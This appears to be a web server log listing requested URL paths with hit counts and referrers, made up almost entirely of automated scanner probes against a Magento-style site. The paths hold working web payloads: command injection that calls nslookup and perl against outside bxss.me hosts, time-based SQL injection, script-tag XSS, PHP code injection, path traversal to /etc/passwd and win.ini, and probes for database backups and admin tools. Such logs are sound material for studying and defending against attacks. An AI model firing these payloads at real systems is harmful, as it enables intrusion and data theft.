/&(nslookup%20hitfibuzphguk0eb99.bxss.me||perl%20-e%20\"gethostbyname('hitfibuzphguk0eb99.bxss.me')\")&'\\\"`0&(nslookup%20hitfibuzphguk0eb99.bxss.me||perl%20-e%20\"gethostbyname('hitfibuzphguk0eb99.bxss.me')\")&`'/js/mage/adminhtml/form.js 1 -
/acc/skin/install/'\"()&%25<acx><ScRiPt%20>c1E3(9718)<%2fScRiPt>/default/css/ie7minus.css 1 https://104.36.149.61/
/\"+response.write(9393742*9068100)+\"/js/mage/adminhtml/flexuploader.js 1 -
/'\"/js/prototype/ 1 -
/XZJUyERa'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/ 1 https://104.36.149.61/
/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php 1 -
/acc/js/%3b(nslookup%20hithnfzrnjwvu037c6.bxss.me||perl%20-e%20\"gethostbyname('hithnfzrnjwvu037c6.bxss.me')\")|(nslookup%20hithnfzrnjwvu037c6.bxss.me||perl%20-e%20\"gethostbyname('hithnfzrnjwvu037c6.bxss.me')\")&(nslookup%20hithnfzrnjwvu037c6.bxss.me||per 1 -
/logs 1 -
/'+response.write(9129642*9897132)+'/index.php/install/ 1 -
/acc/skin/install/default/default/1%00%c0%a7%c0%a2%252527%252522/boxes.css 1 https://104.36.149.61/
/acc/index.php/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/prototype/tooltip.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../../../../../../../etc/passwd%00.jsp 1 -
/adminer-4.2.5.php 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/.%2facc/js/varien/form.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/form.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/skin/'\"()&%25<acx><ScRiPt%20>dgnk(9407)<%2fScRiPt>/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'aq5v'!='aq5v%25/js/prototype/windows/ 1 https://104.36.149.61/
/bxss.me/js/prototype/debug.js 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/accordion.js 1 -
/-1%20OR%202+812-812-1=0+0+0+1/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/image.js 1 -
/`(nslookup%20hitxnbrvhmdxy76015.bxss.me||perl%20-e%20\"gethostbyname('hitxnbrvhmdxy76015.bxss.me')\")`/js/mage/adminhtml/image.js 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/install/default/default/css/reset.css 1 -
/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvc2hlbGxzIiwgIm91dCJdXQ%3d%3d/test.jpeg 1 -
/acc/index.php//........................................................................../../../../../../../../etc/passwd 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"w9i9\"=\"w9i9/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>8tiP(9441)<%2fScRiPt>/skin/frontend/ 1 https://104.36.149.61/
/acc/index.php/..%2fpackage-lock.json 1 -
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/giftmessage.js 1 https://104.36.149.61/
/\"+response.write(9279074*9175149)+\"/js/mage/adminhtml/giftoptions/ 1 -
/1'\"/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/&echo%20fxzgau$()\\%20dmqfjf\\nz^xyu||a%20%23'%20&echo%20fxzgau$()\\%20dmqfjf\\nz^xyu||a%20%23|\"%20&echo%20fxzgau$()\\%20dmqfjf\\nz^xyu||a%20%23/js/prototype/validation.js 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/ 1 -
/<!--/js/mage/adminhtml/accordion.js 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/form.js 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/extended_debug.js 1 -
/MHiAUrMw')%20OR%20823=(SELECT%20823%20FROM%20PG_SLEEP(15))--/skin/install/default/default/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/events.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/ 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/sales/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/giftoptions/ 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/ 1 https://104.36.149.61/
/acc/js// 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/prototype/debug.js 1 -
/acc/js/mage/translate_inline.js/987693%40 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(98).concat(83).concat(102).concat(73)+(require'socket'%0aSocket.gethostbyname('hitap'+'luodfegmd12e2.bxss.me.')[3].to_s)+'/js/prototype/debug.js 1 -
/echo%20nywrgv$()\\%20fbzlua\\nz^xyu||a%20%23'%20&echo%20nywrgv$()\\%20fbzlua\\nz^xyu||a%20%23|\"%20&echo%20nywrgv$()\\%20fbzlua\\nz^xyu||a%20%23/js/prototype/ 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/$(nslookup%20hitjgibirqjef5b953.bxss.me||perl%20-e%20\"gethostbyname('hitjgibirqjef5b953.bxss.me')\")/js/prototype/windows/themes/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/sales/ 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/debug.js 1 -
/acc/%2fxfs.bxss.me/prototype/debug.js 1 -
/.gitlab-ci.yml 1 -
/webfig/ 2 -
/'\"/index.php/install/ 1 -
/%3b(nslookup%20hitbadihvcfhle39fd.bxss.me||perl%20-e%20\"gethostbyname('hitbadihvcfhle39fd.bxss.me')\")|(nslookup%20hitbadihvcfhle39fd.bxss.me||perl%20-e%20\"gethostbyname('hitbadihvcfhle39fd.bxss.me')\")&(nslookup%20hitbadihvcfhle39fd.bxss.me||perl%20-e% 1 -
/acc'\"()&%25<acx><ScRiPt%20>kUNn(9628)<%2fScRiPt>/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/prototype/windows'\"()&%25<acx><ScRiPt%20>sjVf(9389)<%2fScRiPt>/themes/ 1 https://104.36.149.61/
/${@print(md5(31337))}/js/prototype/windows/themes/ 1 -
/oauth/authorize 1 -
/pp404 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/)/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/windows/ 1 https://104.36.149.61/
/nagios/ 1 -
/..%2facc/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%2/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%a 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/default/css/boxes.css 1 https://104.36.149.61/
/xmlrpc.jsp 4 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/default/ 1 -
/../Gemfile 1 -
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/default/css/reset.css 1 https://104.36.149.61/
/bxss.me/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/lua/login.lua 1 -
/${9999154+10000471}/index.php/install/ 1 -
/acc/index.php//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/../../../../../package-lock.json 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/sales/ 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'jP8S'='jP8S/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'w8Lb'='w8Lb/index.php/install/ 1 https://104.36.149.61/
/manage/fckeditor 2 -
/acc/skin/install/default/'\"()&%25<acx><ScRiPt%20>eCQQ(9685)<%2fScRiPt>/css/clears.css 1 https://104.36.149.61/
/acc/.%2fjs/mage/adminhtml/backup.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/windows/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>TmT7(9879)<%2fScRiPt>/varien/form.js 1 https://104.36.149.61/
/db.tar.gz 1 -
//\\../\\../\\../\\../\\../\\../\\../\\../windows/win.ini 1 -
/${@print(md5(31337))}/skin/adminhtml/ 1 -
/hsqldb 1 -
/'%3bprint(md5(31337))%3b$a='/index.php/install/wizard/config/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/flexuploader.js 1 -
/|(nslookup%20hitfabztsorfw69145.bxss.me||perl%20-e%20\"gethostbyname('hitfabztsorfw69145.bxss.me')\")/js/mage/ 1 -
/acc/index.php/install/wizard/beginPost//../../../../../../../../boot.ini 1 -
//js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/ 1 -
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/tooltip.js 1 -
/${10000087+9999512}/js/prototype/tooltip.js 1 -
/logon/LogonPoint/index.html 2 -
/adminer-4.3.1-mysql.php 1 https://104.36.149.61/
/acc9948462/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/skin/adminhtml/default/ 1 -
/cgi-bin/appsettings.Production.json 1 -
/adminer-4.6.0-en.php 1 https://104.36.149.61/
/acc/index.php<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/wizard/config/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/default/css/boxes.css 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hityr\".\"arwoziylfbde7.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(103).chr(78).chr(108).chr(88).\"/js/mage/adminhtml/giftmessage.js 1 -
/^(%23$!@%23$)(()))******/skin/adminhtml/ 1 https://104.36.149.61/
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/install/default/default/css/reset.css 1 -
/bxss.me/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/skin/install/default/default/css/boxes.css 1 -
/|echo%20qizrez$()\\%20brqvip\\nz^xyu||a%20%23'%20|echo%20qizrez$()\\%20brqvip\\nz^xyu||a%20%23|\"%20|echo%20qizrez$()\\%20brqvip\\nz^xyu||a%20%23/js/mage/adminhtml/image.js 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/translate.js 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/accordion.js 1 -
/TS9ODzeh'%20OR%2096=(SELECT%2096%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/admin 1 -
/auth/requestreset 1 -
/-1%20OR%203+851-851-1=0+0+0+1/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/grid.js 1 https://104.36.149.61/
/&(nslookup%20hitavyeenlukvdadbf.bxss.me||perl%20-e%20\"gethostbyname('hitavyeenlukvdadbf.bxss.me')\")&'\\\"`0&(nslookup%20hitavyeenlukvdadbf.bxss.me||perl%20-e%20\"gethostbyname('hitavyeenlukvdadbf.bxss.me')\")&`'/js/prototype/extended_debug.js 1 -
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/image.js 1 https://104.36.149.61/
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2fweb.config 1 -
/acc/index.php/install/wizard/config//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 2 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>Thnf(9743)<%2fScRiPt>.js 1 https://104.36.149.61/
/acc/skin/install/default/%2fxfs.bxss.me/css/reset.css 1 -
/acc/js/mage/adminhtml/accordion'\"()&%25<acx><ScRiPt%20>QlCt(9160)<%2fScRiPt>.js 1 https://104.36.149.61/
/..%2facc/skin/install/default/ 1 https://104.36.149.61/
/acc/skin/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/acc/index.php/install/wizard/beginPost//../WEB-INF/web.xml%00.jsp 1 -
/acc/index.php/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/wizard/config/ 1 -
/acc/index.php/install/wizard/locale<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/eBoSvuRp')%20OR%20772=(SELECT%20772%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/skin/install/default/bxss.me%2ft%2fxss.html%3f%2500/css/ie7minus.css 1 -
/acc9932896/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/&(nslookup%20hitazfnltouyg32b9c.bxss.me||perl%20-e%20\"gethostbyname('hitazfnltouyg32b9c.bxss.me')\")&'\\\"`0&(nslookup%20hitazfnltouyg32b9c.bxss.me||perl%20-e%20\"gethostbyname('hitazfnltouyg32b9c.bxss.me')\")&`'/js/scriptaculous/effects.js 1 -
/${10000343+9999121}/js/mage/adminhtml/giftoptions/ 1 -
/common/phpthumb/phpThumb.php 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/varien/js.js 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"rr6g\"=\"rr6g/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/.history 1 -
/hYorbjyt'%20OR%20506=(SELECT%20506%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'501v'='501v/js/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/install/wizard//../../WEB-INF/web.xml%00.jsp 1 -
/acc/js/prototype/1some_inexistent_file_with_long_name%00.jpg/themes/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/prototype/ 1 -
//skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>WvSu(9251)<%2fScRiPt>/adminhtml/events.js 1 https://104.36.149.61/
/'.gethostbyname(lc('hitnw'.'luupavjaa3959.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(83).chr(104).chr(81).'/js/mage/adminhtml/uploader/ 1 -
/(nslookup%20hitcscgdiboaeaa689.bxss.me||perl%20-e%20\"gethostbyname('hitcscgdiboaeaa689.bxss.me')\")/js/prototype/prototype.js 1 -
/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/install/default/default/ 1 https://104.36.149.61/
/acc/skin/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/default/css/reset.css 1 -
/${10000072+9999444}/skin/install/default/ 1 -
/'+'A'.concat(70-3).concat(22*4).concat(114).concat(70).concat(111).concat(74)+(require'socket'%0aSocket.gethostbyname('hitjz'+'hekqdezy144c5.bxss.me.')[3].to_s)+'/skin/install/default/ 1 -
/echo%20vbjgec$()\\%20lrvxzi\\nz^xyu||a%20%23'%20&echo%20vbjgec$()\\%20lrvxzi\\nz^xyu||a%20%23|\"%20&echo%20vbjgec$()\\%20lrvxzi\\nz^xyu||a%20%23/js/mage/adminhtml/hash.js 1 -
//js/prototype/windows/themes/ 1 https://104.36.149.61/
/SA6e8EO6'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/varien/form.js 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/prototype/ 1 -
/acc/skin/install/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/css/reset.css 1 https://104.36.149.61/
/adminer-4.6.0-mysql-en.php 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>xIbD(9173)<%2fScRiPt>/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/giftoptions/ 1 -
/nmFIpGC0'%20OR%20304=(SELECT%20304%20FROM%20PG_SLEEP(15))--/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/$(nslookup%20hitoiizsfweqk10fdb.bxss.me||perl%20-e%20\"gethostbyname('hitoiizsfweqk10fdb.bxss.me')\")/js/mage/adminhtml/accordion.js 1 -
/acc/index.php/install/.%2fwizard/locale/ 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/default/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>2DaK(9942)<%2fScRiPt>/ 1 https://104.36.149.61/
/1'\"/js/mage/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'HdD9'!='HdD9%25/skin/install/default/default/ 1 https://104.36.149.61/
//../../WEB-INF/web.xml%C0%80.jsp 1 -
/xmlrpc 4 -
/acc/js/'\"()&%25<acx><ScRiPt%20>Thnf(9564)<%2fScRiPt>/translate.js 1 https://104.36.149.61/
/..%2facc/skin/adminhtml/default/ 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(110).concat(84).concat(121).concat(84)+(require'socket'%0aSocket.gethostbyname('hitty'+'enzhvvpya9c54.bxss.me.')[3].to_s)+'/js/mage/adminhtml/wysiwyg/ 1 -
/${@print(md5(31337))}/index.php/install/wizard/locale/ 1 -
//xmlrpc.php 1 -
/acc/js/mage'\"()&%25<acx><ScRiPt%20>bt2L(9945)<%2fScRiPt>/adminhtml/hash.js 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/ 1 https://104.36.149.61/
/phpunit.xml 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>mwZT(9343)<%2fScRiPt>/wysiwyg/ 1 https://104.36.149.61/
/'\"/skin/frontend/ 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>QlCt(9680)<%2fScRiPt>/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/default/css/reset.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/echo%20uqbvma$()\\%20qcconv\\nz^xyu||a%20%23'%20&echo%20uqbvma$()\\%20qcconv\\nz^xyu||a%20%23|\"%20&echo%20uqbvma$()\\%20qcconv\\nz^xyu||a%20%23/skin/install/default/default/css/clears.css 1 -
/!(()&&!|*|*|/skin/install/default/default/ 1 https://104.36.149.61/
/db.zip 1 -
/acc/skin/install/default/default/1some_inexistent_file_with_long_name%00.jpg/iestyles.css 1 https://104.36.149.61/
/soapserver/ 4 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/js/prototype/debug.js 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/skin/install/default/ 1 -
/php.php 1 -
/c80we4lR'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/hash.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'TE5f'='TE5f/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/%2fxfs.bxss.me/mage/adminhtml/image.js 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/windows/ 1 https://104.36.149.61/
/cgi-bin/Gemfile 1 -
/bxss.me/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc'\"()&%25<acx><ScRiPt%20>sGFI(9592)<%2fScRiPt>/js/prototype/tooltip.js 1 https://104.36.149.61/
/acc/.%2fjs/mage/adminhtml/events.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/(nslookup%20hitlswlvmmuid97704.bxss.me||perl%20-e%20\"gethostbyname('hitlswlvmmuid97704.bxss.me')\")/js/mage/adminhtml/sales/ 1 -
//skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
//../WEB-INF/web.xml 1 -
/bxfzwT7z'))%20OR%20823=(SELECT%20823%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>kUNn(9887)<%2fScRiPt>/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/effects.js 1 https://104.36.149.61/
/js/FCKeditor 2 -
/&(nslookup%20hitlvzucjjxuq6f1f2.bxss.me||perl%20-e%20\"gethostbyname('hitlvzucjjxuq6f1f2.bxss.me')\")&'\\\"`0&(nslookup%20hitlvzucjjxuq6f1f2.bxss.me||perl%20-e%20\"gethostbyname('hitlvzucjjxuq6f1f2.bxss.me')\")&`'/js/mage/adminhtml/ 1 -
/acc/skin/..%2finstall/default/default/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/ 1 https://104.36.149.61/
/acc/skin/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/index.php/..%2f..%2f..%2fpackage-lock.json 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/form.js 1 -
/acc/index.php/install/12345'\"\\'\\\") 2 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/browser.js 1 https://104.36.149.61/
/phpThumb.php 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/grid.js 1 -
/acc'\"()&%25<acx><ScRiPt%20>QlCt(9549)<%2fScRiPt>/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/..%2fjs/mage/adminhtml/grid.js 1 https://104.36.149.61/
//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd 1 -
/\"%3bprint(md5(31337))%3b$a=\"/index.php/install/wizard/locale/ 1 -
/6UVNRcmR/js/varien/js.js 1 https://104.36.149.61/
/${10000088+10000497}/js/mage/adminhtml/hash.js 1 -
/nette.micro 1 -
/104_db.tgz 1 -
/acc9478847/skin/install/default/default/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/adminhtml/ 1 https://104.36.149.61/
/@@Bit6k/js/prototype/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale///..//..//..//..//..//..//..//..//..//..//../etc/passwd 1 -
/acc/js/mage/'\"()&%25<acx><ScRiPt%20>gf47(9979)<%2fScRiPt>/ 1 https://104.36.149.61/
/${@print(md5(31337))}\\/js/mage/adminhtml/events.js 1 -
/%2fxfs.bxss.me/js/varien/js.js 1 -
/bower.json 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/default/css/iestyles.css 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/giftoptions/ 1 -
/&(nslookup%20hitsltmqwjgik03cbb.bxss.me||perl%20-e%20\"gethostbyname('hitsltmqwjgik03cbb.bxss.me')\")&'\\\"`0&(nslookup%20hitsltmqwjgik03cbb.bxss.me||perl%20-e%20\"gethostbyname('hitsltmqwjgik03cbb.bxss.me')\")&`'/js/mage/adminhtml/events.js 1 -
/%3b(nslookup%20hitknzwzxfhdxca13e.bxss.me||perl%20-e%20\"gethostbyname('hitknzwzxfhdxca13e.bxss.me')\")|(nslookup%20hitknzwzxfhdxca13e.bxss.me||perl%20-e%20\"gethostbyname('hitknzwzxfhdxca13e.bxss.me')\")&(nslookup%20hitknzwzxfhdxca13e.bxss.me||perl%20-e% 1 -
/'+response.write(9166394*9259310)+'/js/prototype/prototype.js 1 -
/http://bxss.me/t/fit.txt%3F.jpg/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/skin/'\"()&%25<acx><ScRiPt%20>gumy(9907)<%2fScRiPt>/default/ 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/index.php/install/ 1 https://104.36.149.61/
/recordings 1 -
/\"+response.write(9675169*9907866)+\"/index.php/install/wizard/config/ 1 -
/104_db.rar 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../etc/passwd%C0%80.jsp 1 -
/..%2facc/js/prototype/ 1 https://104.36.149.61/
/acc/skin/install/default/default/css'\"()&%25<acx><ScRiPt%20>xIbD(9970)<%2fScRiPt>/reset.css 1 https://104.36.149.61/
/cgi-bin/.gitignore 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/index.php/install/wizard/locale/ 1 -
/.sqlite_history 1 -
/acc/'\"()&%25<acx><ScRiPt%20>XkUp(9471)<%2fScRiPt>/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/104.36.149.61.sql.tar 1 -
//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd 1 -
/bag2 2 -
